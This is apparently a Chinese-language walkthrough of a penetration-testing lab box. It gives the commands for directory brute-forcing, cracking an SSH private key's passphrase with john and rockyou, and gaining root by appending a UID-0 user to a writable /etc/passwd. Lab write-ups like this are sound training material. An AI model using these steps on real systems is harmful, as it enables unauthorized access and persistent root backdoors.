getshell
①常规扫描后未发现有用信息,因此只能对80端口进行大字典爆破
sudo gobuster dir -u http://192.168.43.137 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x php,txt,html,md -o web_scan.txt
/index.html (Status: 200) [Size: 10918]
/.html (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
/goodmath.txt (Status: 200) [Size: 2571]
②发现goodmath.txt文件,将其下载下来发现里边包含RSA私钥文件和用户名agentr
,将私钥文件信息提取出来保存到id_rsa中。
③私钥文件权限一般配置为600即可,修改id_rsa文件权限为600
chmod 600 id_rsa
④尝试连接
ssh -i id_rsa agentr@192.168.43.137 -vv
但提示依旧要输入密码,
⑤使用ssh2john和john工具联合进行破解
ssh2john id_rsa >hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
得到密码为reading
⑥再次尝试登录,提示需要密码时输入reading ,登陆成功!
提权
①常规枚举中发现当前用户对/etc/passwd文件可写,因此可在此文件中新增root权限用户,在kali中使用openssl工具生成用户密码
openssl passwd -1 -salt xiaoliyu 1234567
②在靶机复制/etc/passwd的root行信息,将x修改为使用openssl生成的密码并将其新增到文件中
xiaoliyu:$1$xiaoliyu$TPkEIAAV6c3.9lCGGytdB/:0:0:root:/root:/bin/bash
wq!保存退出。
③kali上使用ssh进行连接,密码为1234567
ssh xiaoliyu@192.168.43.137
④登陆成功,确认当前用户权限为root